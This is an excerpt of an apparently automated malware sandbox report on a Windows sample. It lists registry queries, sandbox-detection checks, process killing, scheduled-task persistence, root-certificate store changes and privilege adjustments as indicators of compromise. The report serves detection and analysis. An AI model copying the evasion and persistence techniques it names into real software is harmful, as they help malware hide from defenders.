\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b2b14b4ec3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bb075283c5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 19338d89d6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27e8838a56.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dcc3187c3d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 19338d89d6.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage a9c940aa2d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bb6617c10a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dcda83bfaa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 586e2a0f18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 19338d89d6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a9c940aa2d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2888 timeout.exe 1032 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 10 IoCs
pid Process 4056 taskkill.exe 1144 taskkill.exe 2552 taskkill.exe 1520 taskkill.exe 864 taskkill.exe 4016 taskkill.exe 2460 taskkill.exe 2440 taskkill.exe 2328 taskkill.exe 3400 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 9 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 586e2a0f18.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 bb075283c5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 586e2a0f18.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Ta3ZyUR.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Ta3ZyUR.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a bb075283c5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a bb075283c5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Ta3ZyUR.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Ta3ZyUR.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2332 schtasks.exe 2164 schtasks.exe 2728 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 1976 skotes.exe 2804 Ta3ZyUR.exe 2804 Ta3ZyUR.exe 2804 Ta3ZyUR.exe 2804 Ta3ZyUR.exe 1876 m5UP2Yj.exe 1876 m5UP2Yj.exe 2044 7aencsM.exe 2044 7aencsM.exe 1664 chrome.exe 1664 chrome.exe 2012 oVpNTUm.exe 2232 C3hYpvm.exe 1016 3omTNLZ.exe 1016 3omTNLZ.exe 1016 3omTNLZ.exe 1016 3omTNLZ.exe 1016 3omTNLZ.exe 2044 7aencsM.exe 2808 powershell.exe 2012 oVpNTUm.exe 2884 oaglv.exe 2808 powershell.exe 2808 powershell.exe 2908 TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE 2044 7aencsM.exe 868 powershell.exe 1552 powershell.exe 1228 powershell.exe 2908 TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE 2908 TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE 2580 ad82802eed.exe 1920 powershell.exe 2580 ad82802eed.exe 2580 ad82802eed.exe 2580 ad82802eed.exe 2580 ad82802eed.exe 1920 powershell.exe 1920 powershell.exe 1692 27e8838a56.exe 1340 483d2fa8a0d53818306efeb32d3.exe 1692 27e8838a56.exe 1692 27e8838a56.exe 1692 27e8838a56.exe 1692 27e8838a56.exe 2140 d33bacfc5a.exe 2896 monthdragon.exe 2896 monthdragon.exe 2896 monthdragon.exe 2896 monthdragon.exe 1780 19338d89d6.exe 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 4040 TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE 4040 TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE 1780 19338d89d6.exe 1780 19338d89d6.exe 3732 bb075283c5.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeDebugPrivilege 2232 C3hYpvm.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeShutdownPrivilege 1664 chrome.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeDebugPrivilege 1228 powershell.exe Token: SeDebugPrivilege 2908 TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 2552 taskkill.exe Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 2440 taskkill.exe Token: SeDebugPrivilege 2328 taskkill.exe Token: SeDebugPrivilege 864 taskkill.exe Token: SeDebugPrivilege 1288 powershell.exe Token: SeDebugPrivilege 2436 firefox.exe Token: SeDebugPrivilege 2436 firefox.exe Token: SeDebugPrivilege 3400 taskkill.exe Token: SeDebugPrivilege 4016 taskkill.exe Token: SeDebugPrivilege 4056 taskkill.exe Token: SeDebugPrivilege 1144 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 3112 firefox.exe Token: SeDebugPrivilege 3112 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
